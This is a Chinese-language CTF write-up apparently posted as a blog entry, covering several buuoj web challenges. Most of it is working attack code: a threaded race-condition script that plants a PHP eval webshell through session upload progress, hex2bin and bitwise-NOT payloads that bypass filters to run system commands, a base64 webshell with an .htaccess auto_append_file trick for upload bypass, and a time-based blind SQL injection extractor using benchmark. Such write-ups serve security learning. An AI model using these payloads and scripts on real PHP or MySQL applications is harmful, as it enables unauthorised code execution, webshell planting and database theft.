这两天期末,发点存货
phpdest
文件竞争
import requests
import io
import threading
url = "http://a44e2fb2-5cb3-4f96-a03f-9657dedc9a39.node4.buuoj.cn:81/"
sessionID = "flag"
data = {"cmd": "system('cat flag.php');"}
def write(session):
while True:
f = io.BytesIO(b'a'*1024*50)
resp = session.post(url=url,data={'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST["cmd"]);?>'},files={'file':('flag.txt',f)},cookies={'PHPSESSID':sessionID})
def read(session):
while True:
resp = session.post(url='http://a44e2fb2-5cb3-4f96-a03f-9657dedc9a39.node4.buuoj.cn:81/?file=/tmp/sess_flag',data=data)
if 'flag.txt' in resp.text:
print(resp.text)
event.clear()
else:
print("=========retry==========")
if __name__ == "__main__":
event = threading.Event()
with requests.session() as session:
for i in range(1,5):
threading.Thread(target=write, args=(session,)).start()
for i in range(1,5):
threading.Thread(target=read, args=(session,)).start()
event.set()
EasyPHP
set_error_handler(
function() use(&$fl4g) {
print $fl4g;
}
数报错然后输出 flag
ctf[]=123
SimpleRCE
hex2bin 绕过
https://www.pudn.com/news/62809145ebb030486d479342.html
可以看一下,里面有
最后执行的是
aaa=hex2bin('73797374656d')('head /f*');
另一种方法
法二
最开始考虑的是无字母 rce,但发现或和异或都被 ban 了所以考虑—url取反绕过
<?php
fwrite(STDOUT,'[+]your function: ');
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT,'[+]your command: ');
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
payload
aaa=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%D5);
funny_upload
对文件类型进行了检测,改为jpg文件后,又对文件内容进行了检测不能有<?,所以采用了base64结合.htaccess伪协议的方式进行绕过
1.jpg
PD9waHAgZXZhbCgkX1BPU1RbYV0pOz8+
.htaccess
SetHandler application/x-httpd-php
php_value auto_append_file "php://filter/convert.base64-decode/resource=1.jpg
上传成功后蚁剑链接即可
Really Easy SQL
sql盲注,sleep被过滤,用benchmark
import requests
import time
url="http://fec87fc0-85b0-4969-a9d2-7328b18dc98b.node4.buuoj.cn:81/"
flag=''
for i in range(1,50):
m=32
n=127
while 1:
mid=(m+n)//2
#payload="0'or(if((ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1))<{}),benchmark(2000000,md5(1)),0))or'".format(i,mid) #flaggg,user
#payload="0'or(if((ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='flaggg')),{},1))<{}),benchmark(2000000,md5(1)),0))or'".format(i,mid) #cmd
payload="0'or(if((ascii(mid((select(cmd)from(flaggg)),{},1))<{}),benchmark(2000000,md5(1)),0))or'".format(i,mid)
data={
'username': 'a',
'password': payload
}
print(data)
try:
r = requests.post(url=url,data=data,timeout=1.5)
m=mid
except:
n=mid
if(m+1==n):
flag+=chr(m)
print(flag)
break
time.sleep(0.2)
time.sleep(1)